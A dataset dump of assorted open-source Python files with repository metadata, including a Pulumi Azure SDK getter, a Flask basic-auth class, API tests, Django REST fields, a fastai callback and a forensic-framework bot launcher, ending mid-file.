hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ace064cea5a25236c91dcf69db85fe736dec030b | 5,718 | py | Python | sdk/python/pulumi_azure_native/cache/v20210201preview/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/cache/v20210201preview/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/cache/v20210201preview/get_private_endpoint_connection.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
"""
The Private Endpoint Connection resource.
"""
def __init__(__self__, id=None, name=None, private_endpoint=None, private_link_service_connection_state=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if private_endpoint and not isinstance(private_endpoint, dict):
raise TypeError("Expected argument 'private_endpoint' to be a dict")
pulumi.set(__self__, "private_endpoint", private_endpoint)
if private_link_service_connection_state and not isinstance(private_link_service_connection_state, dict):
raise TypeError("Expected argument 'private_link_service_connection_state' to be a dict")
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
"""
The resource of private end point.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> 'outputs.PrivateLinkServiceConnectionStateResponse':
"""
A collection of information about the state of the connection between service consumer and provider.
"""
return pulumi.get(self, "private_link_service_connection_state")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the private endpoint connection resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPrivateEndpointConnectionResult(
id=self.id,
name=self.name,
private_endpoint=self.private_endpoint,
private_link_service_connection_state=self.private_link_service_connection_state,
provisioning_state=self.provisioning_state,
type=self.type)
def get_private_endpoint_connection(cluster_name: Optional[str] = None,
private_endpoint_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
"""
The Private Endpoint Connection resource.
:param str cluster_name: The name of the RedisEnterprise cluster.
:param str private_endpoint_connection_name: The name of the private endpoint connection associated with the Azure resource
:param str resource_group_name: The name of the resource group. The name is case insensitive.
"""
__args__ = dict()
__args__['clusterName'] = cluster_name
__args__['privateEndpointConnectionName'] = private_endpoint_connection_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:cache/v20210201preview:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
return AwaitableGetPrivateEndpointConnectionResult(
id=__ret__.id,
name=__ret__.name,
private_endpoint=__ret__.private_endpoint,
private_link_service_connection_state=__ret__.private_link_service_connection_state,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
| 42.355556 | 193 | 0.698846 |
ace064d93eb4797c1abcbd46b84ff21988659dbf | 2,780 | py | Python | 0x07-Session_authentication/api/v1/auth/basic_auth.py | JoseAVallejo12/holbertonschool-web_back_end | eb514784772352b8e4873d1f648726815ab69592 | [
"MIT"
] | null | null | null | 0x07-Session_authentication/api/v1/auth/basic_auth.py | JoseAVallejo12/holbertonschool-web_back_end | eb514784772352b8e4873d1f648726815ab69592 | [
"MIT"
] | null | null | null | 0x07-Session_authentication/api/v1/auth/basic_auth.py | JoseAVallejo12/holbertonschool-web_back_end | eb514784772352b8e4873d1f648726815ab69592 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Auth class for the app."""
from typing import Tuple, TypeVar
from api.v1.auth.auth import Auth
from models.user import User
import base64
import uuid
class BasicAuth(Auth):
"""Basic Auth class."""
def extract_base64_authorization_header(self,
authorization_header: str) -> str:
"""Extract_base64_authorization_header."""
if (self.__isInValid(authorization_header)
or not authorization_header.startswith('Basic ')):
return None
return authorization_header.split(' ')[1].lstrip()
def decode_base64_authorization_header(self,
base64_authorization_header: str
) -> str:
"""Decode_base64_authorization_header."""
if self.__isInValid(base64_authorization_header):
return None
try:
return base64.b64decode(
base64_authorization_header).decode("utf-8")
except Exception:
return None
def extract_user_credentials(self,
decoded_base64_authorization_header: str
) -> Tuple[str, str]:
"""Extract_user_credentials."""
if (self.__isInValid(decoded_base64_authorization_header)
or decoded_base64_authorization_header.count(':') == 0):
return (None, None)
headers = decoded_base64_authorization_header.split(':', 1)
return (headers[0].lstrip(), headers[1].lstrip())
def user_object_from_credentials(self, user_email: str,
user_pwd: str) -> TypeVar('User'):
"""User_object_from_credentials."""
if self.__isInValid(user_email) or self.__isInValid(user_pwd):
return None
user = User()
user.load_from_file()
users = []
for item in user.search({'email': user_email}):
if item.is_valid_password(user_pwd):
users.append(item)
return users[0] if len(users) > 0 else None
def __isInValid(self, parametter: str) -> bool:
"""Validate arg commin to function"""
if (parametter is None or not isinstance(parametter, str)):
return True
return False
def current_user(self, request) -> TypeVar('User'):
"""Overload method in base Auth class."""
user_data = self.authorization_header(request)
user_email, user_password = self.extract_user_credentials(
self.decode_base64_authorization_header(
self.extract_base64_authorization_header(user_data)
))
return self.user_object_from_credentials(user_email, user_password)
| 38.082192 | 78 | 0.601799 |
ace0652d238f78dfd23749e10757e4b4aac84673 | 1,350 | py | Python | tests/test_listener_per_request/test_asyncio.py | opentracing-contrib/python-examples | c1a3f619ed7c1f20813ac6dd5da198ddbfc5ade0 | [
"Apache-2.0"
] | 5 | 2017-10-13T22:55:55.000Z | 2020-08-19T22:23:49.000Z | tests/test_listener_per_request/test_asyncio.py | opentracing-contrib/python-examples | c1a3f619ed7c1f20813ac6dd5da198ddbfc5ade0 | [
"Apache-2.0"
] | null | null | null | tests/test_listener_per_request/test_asyncio.py | opentracing-contrib/python-examples | c1a3f619ed7c1f20813ac6dd5da198ddbfc5ade0 | [
"Apache-2.0"
] | 2 | 2018-03-21T10:13:22.000Z | 2021-04-05T10:36:32.000Z | from __future__ import print_function
import asyncio
from opentracing.ext import tags
from mocktracer import MockTracer
from ..span_propagation import AsyncioScopeManager
from ..testcase import OpenTracingTestCase
from ..utils import get_one_by_tag
from .response_listener import ResponseListener
class Client(object):
def __init__(self, tracer, loop):
self.tracer = tracer
self.loop = loop
async def task(self, message, listener):
res = '%s::response' % message
listener.on_response(res)
return res
def send_sync(self, message):
span = self.tracer.start_span('send')
span.set_tag(tags.SPAN_KIND, tags.SPAN_KIND_RPC_CLIENT)
listener = ResponseListener(span)
return self.loop.run_until_complete(self.task(message, listener))
class TestThreads(OpenTracingTestCase):
def setUp(self):
self.tracer = MockTracer(AsyncioScopeManager())
self.loop = asyncio.get_event_loop()
def test_main(self):
client = Client(self.tracer, self.loop)
res = client.send_sync('message')
self.assertEquals(res, 'message::response')
spans = self.tracer.finished_spans()
self.assertEqual(len(spans), 1)
span = get_one_by_tag(spans, tags.SPAN_KIND, tags.SPAN_KIND_RPC_CLIENT)
self.assertIsNotNone(span)
| 28.723404 | 79 | 0.702222 |
ace065f7d79bef54c499ad393ac49ef3f7ab2294 | 2,776 | py | Python | tests/test_api_endpoints/test_report_endpoints.py | andreasCastor/castoredc_api | ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0 | [
"MIT"
] | null | null | null | tests/test_api_endpoints/test_report_endpoints.py | andreasCastor/castoredc_api | ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0 | [
"MIT"
] | null | null | null | tests/test_api_endpoints/test_report_endpoints.py | andreasCastor/castoredc_api | ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Testing class for report endpoints of the Castor EDC API Wrapper.
Link: https://data.castoredc.com/api#/report
@author: R.C.A. van Linschoten
https://orcid.org/0000-0003-3052-596X
"""
import pytest
from tests.test_api_endpoints.data_models import report_model
from castoredc_api_client import CastorException
class TestReport:
model_keys = report_model.keys()
test_report = {
"id": "770DB401-6100-4CF5-A95F-3402B55EAC48",
"report_id": "770DB401-6100-4CF5-A95F-3402B55EAC48",
"name": "Comorbidities",
"description": "",
"type": "other",
"_links": {
"self": {
"href": "https://data.castoredc.com/api/study/D234215B-D956-482D-BF17-71F2BB12A2FD/report/770DB401-6100-4CF5-A95F-3402B55EAC48"
}
},
}
@pytest.fixture(scope="class")
def all_reports(self, client):
"""Gets all reports from the study."""
all_reports = client.all_reports()
return all_reports
def test_all_reports(self, all_reports, item_totals):
"""Tests if all reports are returned from the study."""
assert len(all_reports) > 0, "No reports found in the study, is this right?"
assert len(all_reports) == item_totals("/report")
def test_all_reports_model(self, all_reports):
"""Tests if all_reports returns the right model."""
for report in all_reports:
api_keys = report.keys()
# Tests if the model is the right length
assert len(self.model_keys) == len(api_keys)
# Tests if the keys and types of values are what they should be
for key in self.model_keys:
assert key in api_keys
assert type(report[key]) in report_model[key]
def test_all_reports_data(self, all_reports):
"""Tests the data of the reports returned by all_reports"""
# Select a report
report = next(
(
report
for report in all_reports
if report["report_id"] == "770DB401-6100-4CF5-A95F-3402B55EAC48"
),
None,
)
# Check if the right data is returned.
assert report == self.test_report
def test_single_report_success(self, client):
"""Tests if single report returns the proper data."""
report = client.single_report("770DB401-6100-4CF5-A95F-3402B55EAC48")
assert report == self.test_report
def test_single_report_failure(self, client):
"""Tests if single report returns an error."""
with pytest.raises(CastorException) as e:
client.single_report("FAKEB401-6100-4CF5-A95F-3402B55EAC48")
assert str(e.value) == "404 Entity not found."
| 36.051948 | 143 | 0.626441 |
ace0667a9ab976d3e2b8304102f7f023834fa01c | 3,512 | py | Python | awx/api/fields.py | Avinesh/awx | 6310a2edd890d6062a9f6bcdeb2b46c4b876c2bf | [
"Apache-2.0"
] | 17 | 2021-04-03T01:40:17.000Z | 2022-03-03T11:45:20.000Z | awx/api/fields.py | Avinesh/awx | 6310a2edd890d6062a9f6bcdeb2b46c4b876c2bf | [
"Apache-2.0"
] | 24 | 2021-05-18T21:13:35.000Z | 2022-03-29T10:23:52.000Z | awx/api/fields.py | hostinger/awx | dac01b14e2c04c201a162ea03ef8386d822e3923 | [
"Apache-2.0"
] | 24 | 2020-11-27T08:37:35.000Z | 2021-03-08T13:27:15.000Z | # Copyright (c) 2016 Ansible, Inc.
# All Rights Reserved.
# Django
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ObjectDoesNotExist
# Django REST Framework
from rest_framework import serializers
# AWX
from awx.conf import fields
from awx.main.models import Credential
__all__ = ['BooleanNullField', 'CharNullField', 'ChoiceNullField', 'VerbatimField']
class NullFieldMixin(object):
'''
Mixin to prevent shortcutting validation when we want to allow null input,
but coerce the resulting value to another type.
'''
def validate_empty_values(self, data):
(is_empty_value, data) = super(NullFieldMixin, self).validate_empty_values(data)
if is_empty_value and data is None:
return (False, data)
return (is_empty_value, data)
class BooleanNullField(NullFieldMixin, serializers.NullBooleanField):
'''
Custom boolean field that allows null and empty string as False values.
'''
def to_internal_value(self, data):
return bool(super(BooleanNullField, self).to_internal_value(data))
class CharNullField(NullFieldMixin, serializers.CharField):
'''
Custom char field that allows null as input and coerces to an empty string.
'''
def __init__(self, **kwargs):
kwargs['allow_null'] = True
super(CharNullField, self).__init__(**kwargs)
def to_internal_value(self, data):
return super(CharNullField, self).to_internal_value(data or u'')
class ChoiceNullField(NullFieldMixin, serializers.ChoiceField):
'''
Custom choice field that allows null as input and coerces to an empty string.
'''
def __init__(self, **kwargs):
kwargs['allow_null'] = True
super(ChoiceNullField, self).__init__(**kwargs)
def to_internal_value(self, data):
return super(ChoiceNullField, self).to_internal_value(data or u'')
class VerbatimField(serializers.Field):
'''
Custom field that passes the value through without changes.
'''
def to_internal_value(self, data):
return data
def to_representation(self, value):
return value
class OAuth2ProviderField(fields.DictField):
default_error_messages = {
'invalid_key_names': _('Invalid key names: {invalid_key_names}'),
}
valid_key_names = {'ACCESS_TOKEN_EXPIRE_SECONDS', 'AUTHORIZATION_CODE_EXPIRE_SECONDS', 'REFRESH_TOKEN_EXPIRE_SECONDS'}
child = fields.IntegerField(min_value=1)
def to_internal_value(self, data):
data = super(OAuth2ProviderField, self).to_internal_value(data)
invalid_flags = (set(data.keys()) - self.valid_key_names)
if invalid_flags:
self.fail('invalid_key_names', invalid_key_names=', '.join(list(invalid_flags)))
return data
class DeprecatedCredentialField(serializers.IntegerField):
def __init__(self, **kwargs):
kwargs['allow_null'] = True
kwargs['default'] = None
kwargs['min_value'] = 1
kwargs.setdefault('help_text', 'This resource has been deprecated and will be removed in a future release')
super(DeprecatedCredentialField, self).__init__(**kwargs)
def to_internal_value(self, pk):
try:
pk = int(pk)
except ValueError:
self.fail('invalid')
try:
Credential.objects.get(pk=pk)
except ObjectDoesNotExist:
raise serializers.ValidationError(_('Credential {} does not exist').format(pk))
return pk
| 31.079646 | 122 | 0.693907 |
ace0679015a6110ab4df4fd1b5b13a71578e80bb | 1,772 | py | Python | service/__init__.py | LiuYuWei/azure-function-cassandra-blob | ebb9eb0500abd46847d4e0ba49d2e73ed7d0493e | [
"Apache-2.0"
] | null | null | null | service/__init__.py | LiuYuWei/azure-function-cassandra-blob | ebb9eb0500abd46847d4e0ba49d2e73ed7d0493e | [
"Apache-2.0"
] | 1 | 2020-02-15T01:16:01.000Z | 2020-02-15T01:16:01.000Z | service/__init__.py | LiuYuWei/azure-function-cassandra-blob | ebb9eb0500abd46847d4e0ba49d2e73ed7d0493e | [
"Apache-2.0"
] | null | null | null | import os
import sys
try:
sys.path.append(os.environ['PROJECT_PATH'])
except:
print('please add PROJECT_PATH to your environment')
sys.exit(1)
import json
import logging
import azure.functions as func
from service.function_http_request import FunctionHttpRequest
from config.config_setting import ConfigSetting
from src.dao.cassandra_dao import CassandraDao
from src.dao.azure_blob_dao import AzureBlobService
def main(req: func.HttpRequest) -> func.HttpResponse:
url_text = "None"
config_setting = ConfigSetting()
log = config_setting.set_logger("[ azure_function ]", os.path.join("tmp/", "logs"))
log.info('Python HTTP trigger function processed a request.')
function_http_request = FunctionHttpRequest(req)
query_text = function_http_request.get_request_value('query_text')
blob_store = function_http_request.get_request_value('blob_store')
cassandra_dao = CassandraDao()
cassandra_dao.connection_setting()
df = cassandra_dao.get_query_data(query_text)
log.info(blob_store)
if blob_store == "True":
log.info("存到azure blob中")
output_csv_file = df.to_csv(index_label="idx", encoding = "utf-8")
azure_blob_service = AzureBlobService()
azure_blob_service.connection_setting()
azure_blob_service.create_file_on_blob(output_csv_file)
url_text = azure_blob_service.url_download_generate()
df_json = df.to_json(orient='records',default_handler=str)
json_text = json.dumps({"url":url_text, "data":df_json})
if query_text:
return func.HttpResponse(json_text)
else:
return func.HttpResponse(
"Please pass a name on the query string or in the request body",
status_code=400
)
| 32.814815 | 87 | 0.720655 |
ace06818dd0258b58f5cd8e2d0f16711817f75f3 | 1,093 | py | Python | scourgify/tests/test_cleaning.py | yuskey/usaddress-scourgify | 3cf4b953017433a071b523235a90c74348b245cc | [
"MIT"
] | 116 | 2018-07-17T18:55:33.000Z | 2022-03-04T19:11:12.000Z | scourgify/tests/test_cleaning.py | yuskey/usaddress-scourgify | 3cf4b953017433a071b523235a90c74348b245cc | [
"MIT"
] | 14 | 2018-10-27T21:45:55.000Z | 2022-02-17T15:57:00.000Z | scourgify/tests/test_cleaning.py | yuskey/usaddress-scourgify | 3cf4b953017433a071b523235a90c74348b245cc | [
"MIT"
] | 28 | 2018-09-05T13:00:42.000Z | 2022-01-21T17:04:09.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
copyright (c) 2016-2019 Earth Advantage.
All rights reserved
"""
# Imports from Standard Library
from unittest import TestCase
# Local Imports
from scourgify.cleaning import strip_occupancy_type
class CleaningTests(TestCase):
def test_strip_occupancy_type(self):
expected = '33'
line2 = 'Unit 33'
result = strip_occupancy_type(line2)
self.assertEqual(result, expected)
line2 = 'Apartment 33'
result = strip_occupancy_type(line2)
self.assertEqual(result, expected)
line2 = 'Unit #33'
result = strip_occupancy_type(line2)
self.assertEqual(result, expected)
line2 = 'Building 3 Unit 33'
result = strip_occupancy_type(line2)
self.assertEqual(result, expected)
line2 = 'Building 3 UN 33'
result = strip_occupancy_type(line2)
self.assertEqual(result, expected)
line2 = '33'
result = strip_occupancy_type(line2)
self.assertEqual(result, expected)
| 25.418605 | 52 | 0.638609 |
ace068fba581fb7378328215ee312fa7567e9b66 | 767 | py | Python | pyefun/processPoolUtil_test.py | 1431241631/pyefun | ac2290d4bcc8de16c195d2782f3eacd26e5e6ed4 | [
"Apache-2.0"
] | 1 | 2021-08-23T07:48:17.000Z | 2021-08-23T07:48:17.000Z | pyefun/processPoolUtil_test.py | 1431241631/pyefun | ac2290d4bcc8de16c195d2782f3eacd26e5e6ed4 | [
"Apache-2.0"
] | null | null | null | pyefun/processPoolUtil_test.py | 1431241631/pyefun | ac2290d4bcc8de16c195d2782f3eacd26e5e6ed4 | [
"Apache-2.0"
] | null | null | null | import unittest
from .processPoolUtil import *
from .__init__ import *
class TestProcessPoolUtil(unittest.TestCase):
def test_1(self):
pass
def 任务函数(参数):
print("任务函数",参数)
return 参数
任务池 = 进程池(4)
result = []
for url in range(10):
task = 任务池.投递任务(任务函数, (url))
result.append(task)
延时(2)
for res in result:
try:
data = 任务池.进程池_取返回值(res)
print(data)
except:
print("出错了")
任务池.进程池_停止添加子进程()
任务池.进程池_终止所有子进程()
def test_2(self):
def 任务函数(参数):
print("任务函数",参数)
return 参数
x = 进程_创建(任务函数)
x.进程_启动()
x.进程_等待进程()
| 17.431818 | 45 | 0.466754 |
ace069df45d959f6a9d360f5d855478342a9cddc | 235 | py | Python | examples/botnet/hellobot/hello-bm.py | dasec/ForTrace | b8187522a2c83fb661e5a1a5f403da8f40a31ead | [
"MIT"
] | 1 | 2022-03-31T14:01:51.000Z | 2022-03-31T14:01:51.000Z | examples/botnet/hellobot/hello-bm.py | dasec/ForTrace | b8187522a2c83fb661e5a1a5f403da8f40a31ead | [
"MIT"
] | null | null | null | examples/botnet/hellobot/hello-bm.py | dasec/ForTrace | b8187522a2c83fb661e5a1a5f403da8f40a31ead | [
"MIT"
] | 1 | 2022-03-31T14:02:30.000Z | 2022-03-31T14:02:30.000Z | from __future__ import absolute_import
from fortrace.botnet.bots.hellobot.hello_bot import HelloBotMaster
from six.moves import input
__author__ = 'Sascha Kopp'
b = HelloBotMaster()
b.start()
input("press enter to exit:\n")
b.stop()
| 21.363636 | 66 | 0.787234 |
ace06b077719e7892e27a70d070ad4e697428834 | 6,247 | py | Python | tsai/callback/PredictionDynamics.py | mvccn/tsai | 94207d69d8a1531b5847b76a2b453296d9b8042d | [
"Apache-2.0"
] | 1 | 2021-09-16T04:35:38.000Z | 2021-09-16T04:35:38.000Z | tsai/callback/PredictionDynamics.py | mvccn/tsai | 94207d69d8a1531b5847b76a2b453296d9b8042d | [
"Apache-2.0"
] | 1 | 2021-12-21T12:13:59.000Z | 2021-12-21T12:13:59.000Z | tsai/callback/PredictionDynamics.py | mvccn/tsai | 94207d69d8a1531b5847b76a2b453296d9b8042d | [
"Apache-2.0"
] | 1 | 2021-08-12T20:45:07.000Z | 2021-08-12T20:45:07.000Z | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/064_callback.PredictionDynamics.ipynb (unless otherwise specified).
__all__ = ['PredictionDynamics']
# Cell
from fastai.callback.all import *
from ..imports import *
# Cell
class PredictionDynamics(Callback):
order, run_valid = 65, True
def __init__(self, show_perc=1., figsize=(6, 6), alpha=.3, size=30, color='lime', cmap='gist_rainbow'):
"""
Args:
show_perc: percent of samples from the valid set that will be displayed. Default: 1 (all).
You can reduce it if the number is too high and the chart is too busy.
alpha: level of transparency. Default:.3. 1 means no transparency.
figsize: size of the chart. You may want to expand it if too many classes.
size: size of each sample in the chart. Default:30. You may need to decrease it a bit if too many classes/ samples.
color: color used in regression plots.
cmap: color map used in classification plots.
The red line in classification tasks indicate the average probability of true class.
"""
store_attr("show_perc,figsize,alpha,size,color,cmap")
def before_fit(self):
self.run = not hasattr(self.learn, 'lr_finder') and not hasattr(self, "gather_preds")
if not self.run:
return
self.cat = True if (hasattr(self.dls, "c") and self.dls.c > 1) else False
if self.show_perc != 1:
valid_size = len(self.dls.valid.dataset)
self.show_idxs = np.random.choice(valid_size, int(round(self.show_perc * valid_size)), replace=False)
# Prepare ground truth container
self.y_true = []
def before_epoch(self):
# Prepare empty pred container in every epoch
self.y_pred = []
def after_pred(self):
if self.training:
return
# Get y_true in epoch 0
if self.epoch == 0:
self.y_true.extend(self.y.cpu().flatten().numpy())
# Gather y_pred for every batch
if self.cat:
y_pred = torch.gather(F.softmax(self.pred.detach().cpu(), 1), -1, self.y.cpu().reshape(-1, 1).long())
else:
y_pred = self.pred.detach().cpu()
self.y_pred.extend(y_pred.flatten().numpy())
def after_epoch(self):
# Ground truth
if self.epoch == 0:
self.y_true = np.array(self.y_true)
if self.show_perc != 1:
self.y_true = self.y_true[self.show_idxs]
self.y_bounds = (np.min(self.y_true), np.max(self.y_true))
self.min_x_bounds, self.max_x_bounds = np.min(self.y_true), np.max(self.y_true)
self.y_pred = np.array(self.y_pred)
if self.show_perc != 1:
self.y_pred = self.y_pred[self.show_idxs]
if self.cat:
self.update_graph(self.y_pred, self.y_true)
else:
# Adjust bounds during validation
self.min_x_bounds = min(self.min_x_bounds, np.min(self.y_pred))
self.max_x_bounds = max(self.max_x_bounds, np.max(self.y_pred))
x_bounds = (self.min_x_bounds, self.max_x_bounds)
self.update_graph(self.y_pred, self.y_true, x_bounds=x_bounds, y_bounds=self.y_bounds)
def after_fit(self):
plt.close(self.graph_ax.figure)
def update_graph(self, y_pred, y_true, x_bounds=None, y_bounds=None):
if not hasattr(self, 'graph_fig'):
self.df_out = display("", display_id=True)
if self.cat:
self._cl_names = self.dls.vocab
self._classes = L(self.dls.vocab.o2i.values())
self._n_classes = len(self._classes)
self._h_vals = np.linspace(-.5, self._n_classes - .5, self._n_classes + 1)[::-1]
_cm = plt.get_cmap(self.cmap)
self._color = [_cm(1. * c/self._n_classes) for c in range(1, self._n_classes + 1)][::-1]
self._rand = []
for i, c in enumerate(self._classes):
self._rand.append(.5 * (np.random.rand(np.sum(y_true == c)) - .5))
self.graph_fig, self.graph_ax = plt.subplots(1, figsize=self.figsize)
self.graph_out = display("", display_id=True)
self.graph_ax.clear()
if self.cat:
for i, c in enumerate(self._classes):
self.graph_ax.scatter(y_pred[y_true == c], y_true[y_true == c] + self._rand[i], color=self._color[i],
edgecolor='black', alpha=self.alpha, linewidth=.5, s=self.size)
self.graph_ax.vlines(np.mean(y_pred[y_true == c]), i - .5, i + .5, color='r')
self.graph_ax.vlines(.5, min(self._h_vals), max(self._h_vals), linewidth=.5)
self.graph_ax.hlines(self._h_vals, 0, 1, linewidth=.5)
self.graph_ax.set_xlim(0, 1)
self.graph_ax.set_ylim(min(self._h_vals), max(self._h_vals))
self.graph_ax.set_xticks(np.linspace(0, 1, 11))
self.graph_ax.set_yticks(self._classes)
self.graph_ax.set_yticklabels(self._cl_names)
self.graph_ax.set_xlabel('probability of true class', fontsize=12)
self.graph_ax.set_ylabel('true class', fontsize=12)
self.graph_ax.grid(axis='x', color='gainsboro', linewidth=.2)
else:
self.graph_ax.scatter(y_pred, y_true, lw=1, color=self.color,
edgecolor='black', alpha=self.alpha, linewidth=.5, s=self.size)
self.graph_ax.set_xlim(*x_bounds)
self.graph_ax.set_ylim(*y_bounds)
self.graph_ax.plot([*x_bounds], [*x_bounds], color='gainsboro')
self.graph_ax.set_xlabel('y_pred', fontsize=12)
self.graph_ax.set_ylabel('y_true', fontsize=12)
self.graph_ax.grid(color='gainsboro', linewidth=.2)
self.graph_ax.set_title(f'Prediction Dynamics \nepoch: {self.epoch +1}/{self.n_epoch}')
self.df_out.update(pd.DataFrame(np.stack(self.learn.recorder.values)[-1].reshape(1,-1),
columns=self.learn.recorder.metric_names[1:-1], index=[self.epoch]))
self.graph_out.update(self.graph_ax.figure) | 48.804688 | 133 | 0.600928 |
ace06b15f5e14cbab05bf6657172bae626e96694 | 998 | py | Python | database.py | napsterstiffler/faceoff | af0c92e3803e74bfd5922ac980457728427d2605 | [
"MIT"
] | null | null | null | database.py | napsterstiffler/faceoff | af0c92e3803e74bfd5922ac980457728427d2605 | [
"MIT"
] | null | null | null | database.py | napsterstiffler/faceoff | af0c92e3803e74bfd5922ac980457728427d2605 | [
"MIT"
] | null | null | null | from pymongo import MongoClient
import yaml
class Database:
def __init__(self):
with open('conf/pass.yml', 'r') as f:
conf = yaml.load(f)
uri = conf['mlab']['uri']
self.MONGODB_URI = uri
self.client = MongoClient(self.MONGODB_URI, connectTimeoutMS=30000)
self.db = self.client.get_database("faceoff")
self.face = self.db.faces
def getAll(self):
records = self.face.find({})
return records
def pushRECORD(self, record):
self.face.insert_one(record)
def pushEntryLog(self, log):
self.db.entrylog.insert_one(log)
def pushdatelog(self, d):
self.db.entrylog.insert_one(d)
def getlogbydate(self, d):
return self.db.entrylog.find_one({'_id': d})
def updatelog(self, id, data, name):
self.db.entrylog.update_one({'_id': id}, {'$set': {'logs': data}}, upsert=True)
print(name+' updated')
db = Database()
| 25.589744 | 89 | 0.58517 |
ace06ccfff334149c4411f37d3d45640186bddb4 | 25,325 | py | Python | src/providerhub/azext_providerhub/tests/latest/example_steps.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/providerhub/azext_providerhub/tests/latest/example_steps.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/providerhub/azext_providerhub/tests/latest/example_steps.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.cli.testsdk import (live_only)
from azure.cli.testsdk.scenario_tests import AllowLargeResponse
from .. import try_manual
# EXAMPLE: /CustomRollouts/put/CustomRollouts_CreateOrUpdate
@try_manual
def step_custom_rollout_create(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub custom-rollout create '
'--provider-namespace "{providerNamespace}" '
'--rollout-name "{customRolloutName}" '
